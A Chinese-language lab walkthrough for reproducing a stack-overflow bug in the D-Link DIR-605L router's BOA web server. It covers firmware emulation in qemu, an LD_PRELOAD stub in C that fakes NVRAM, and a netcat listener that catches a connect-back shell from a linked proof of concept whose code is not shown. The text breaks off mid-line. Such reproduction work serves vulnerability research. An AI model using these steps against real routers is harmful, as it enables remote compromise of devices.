受影响系统.docx

一、受影响系统:D-Link Wireless N300 Cloud Router (DIR-605L) Firmware Version : 1.10 , 1.12 , 1.13二、漏洞简述:漏洞存在于BOA web服务器处理CAPTCHA数据，通过构造畸形的HTTP POST请求可引起栈溢出。三、漏洞环境搭建:1、下载相关的firmware/Gateway/dir605L/Firmware//Gateway/dir605L/Firmware/2、firmware-mod-kit下载/p/firmware-mod-kit/svn checkout /svn/ firmware-mod-kit-read-only3、解压firmware参考/2011/09/exploiting-embedded-systems-part-1/4、编译qemu重点:要使用静态编译连接与不检查ELF头部的qemuA、不检查ELF头部参考/2011/12/qemu-vs-sstrip//2011/12/qemu-vs-sstrip/注意mips平台，所以要注释掉 ehdr-e_shentsize == sizeof(struct elf_shdr)B、静态编译./configure --static make sudo make install参考/2011/09/exploiting-embedded-systems-part-3//2011/09/exploiting-embedded-systems-part-3/5.模拟NVRAM配置信息参考/2012/03/emulating-nvram-in-qemu//2012/03/emulating-nvram-in-qemu/采用LD_PRELOAD去伪装返回一些值，用于模拟NVRAM配置信息下载mips交叉编译链/backfire/10.03.1/ar71xx//backfire/10.03.1/ar71xx/OpenWrt-Toolchain-ar71xx-for-mips_r2-gcc-4.3.3+cs_uClibc-.tar.bz2编译apmib.c参考:/wp-content/uploads/2012/10/apmib.txt/wp-content/uploads/2012/10/apmib.txt/* * LD_PRELOAD lib for faking calls to the apmib library. * * $ mips-linux-gcc -Wall -fPIC -shared apmib.c -o apmib-ld.so */#include stdio.h#include stdlib.h#define MIB_IP_ADDR170#define MIB_HW_VER0x250#define MIB_CAPTCHA0x2C1#define DEBUGint apmib_init(void){// Fake it.return 1;}void apmib_get(int code, int *value){switch(code){case MIB_HW_VER:*value = 0xF1;break;case MIB_IP_ADDR:*value = 0x7F000001;break;case MIB_CAPTCHA:*value = 1;break;}#ifdef DEBUGprintf(Code: 0x%X (%d) Value: 0x%X (%d)\n, code, code, *value, *value); #endifreturn;}四、漏洞重现1.用qemu的自动调试接口，切换目录至文件系统的rootfs目录下（由firmware解压得来),运行chroot . ./qemu-mips -E LD_PRELOAD =lib/apmib-ld.so -g 1234 bin/boa –d或者用/2011/09/exploiting-embedded-systems-part-3//2011/09/exploiting-embedded-systems-part-3/上的bash script2.nc监听D:\nc -vlp 31337正在监听[任何一个(多个)] 31337 ...连接到 [] 来自 localhost [2] 425423.运行pocPOC如下:/wp-content/uploads/2012/10/dir605l_exploit.txt/wp-content/uploads/2012/10/dir605l_exploit.txt其中POC里头固定写着连接方的IP和端口此处修改IP# Big endian IP addres